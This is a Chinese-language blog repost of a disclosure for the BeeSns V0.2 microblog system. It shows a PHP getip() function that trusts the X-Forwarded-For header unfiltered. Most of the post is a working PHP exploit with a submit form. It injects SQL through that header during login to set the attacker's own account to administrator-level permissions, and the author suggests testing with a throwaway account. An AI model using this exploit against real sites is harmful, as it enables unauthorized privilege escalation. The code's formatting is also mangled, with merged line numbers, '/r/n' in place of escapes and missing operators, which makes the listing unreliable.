2. 技术人生
    3. BeeSns微博系统V0.2提升权限oday+exp

    BeeSns微博系统V0.2提升权限oday+exp

    技术2024-06-16  75

    发布日期:2011-1.27发布作者:子仪影响版本:BeeSns V0.2官方地址: http://www.beesns.com/漏洞描述:IP过滤不严,导致用户可以提交恶意参数提升自身权限 

    这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧 

    01// 获取客户端IP 02functiongetip() { 03 if(isset($_SERVER)) { 04  if(isset($_SERVER[HTTP_X_FORWARDED_FOR])) { 05   $realip= $_SERVER[HTTP_X_FORWARDED_FOR]; 06  } elseif(isset($_SERVER[HTTP_CLIENT_IP])) { 07   $realip= $_SERVER[HTTP_CLIENT_IP]; 08  } else{ 09   $realip= $_SERVER[REMOTE_ADDR]; 10  } 11 } else{ 12  if(getenv("HTTP_X_FORWARDED_FOR")) { 13   $realip= getenv( "HTTP_X_FORWARDED_FOR"); 14  } elseif(getenv("HTTP_CLIENT_IP")) { 15   $realip= getenv("HTTP_CLIENT_IP"); 16  } else{ 17   $realip= getenv("REMOTE_ADDR"); 18  } 19 } 20 $iphide=explode(".",$realip); 21    22 $realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生 23 return$realip; 24}

    老掉牙的漏洞了,纯属YY。 - -!

    EXP: 

    01<?php 02print_r(' 03+---------------------------------------------------------------------------+<br> 04BeeSns v0.2 Getip() Remote SQL Injection Exploit<br> 05site:www.beesns.com  <br> 06by 子仪<br> 07Blog: http://www.zyday.com  <br> 08                09+---------------------------------------------------------------------------+<br>'); 10   11if(empty($_POST[submit])) { 12}else{ 13 error_reporting(7); 14 ini_set('max_execution_time', 0); 15 $host= $_POST[host]; 16 $path= $_POST[path]; 17 $username$_POST[username]; 18 $password$_POST[password]; 19 send(); 20}  21<!--more--> 22   23functionsend() 24{ 25    global$host, $path,$username,$password;  26   27    $cmd= "uId=".$username."&uPw=".$password; 28    $getinj="1.1.1.1',permissions=5 where uid='$username'#"; 29    $data= "POST ".$path."post.php?act=userLogin HTTP/1.1/r/n"; 30    $data.= "Accept: */*/r/n"; 31    $data.= "Accept-Language: zh-cn/r/n"; 32    $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; 33    $data.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; 34    $data.= "Host: $host/r/n"; 35    $data.= "Content-Length: ".strlen($cmd)."/r/n"; 36    $data.= "Connection: Close/r/n"; 37    $data.= "X-Forwarded-For: $getinj/r/n/r/n"; 38    $data.= $cmd;  39   40    $fp= fsockopen($host, 80); 41    fputs($fp, $data);  42   43    $resp= '';  44   45    while($fp&& !feof($fp)) 46        $resp.= fread($fp, 1024);  47   48 if(preg_match('#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis',$resp)){ 49  echo"<br><font color='green'>提升权限成功!</font>"; 50 }else{ 51  echo"<font color='red'>Failed!</font>"; 52 } 53     54} 55?> 56<form action=''method='POST'> 57目标地址:<input type='input'name='host'value='www.zyday.com'>*请勿加<a href="http://%3cbr/">http://<br</a>> 58二级目录:<input type='input'name='path'value='/'>*如果不是二级目录,请保持默认<br> 59用户名:<input type='input'name='username'>*您在目标站申请的用户名,<font color='red'>建议用小号测试</font><br> 60密码:<input type='input'name='password'><br> 61<input type='submit'name='submit'value='提升权限'><br> 62</form>
    最新回复(0)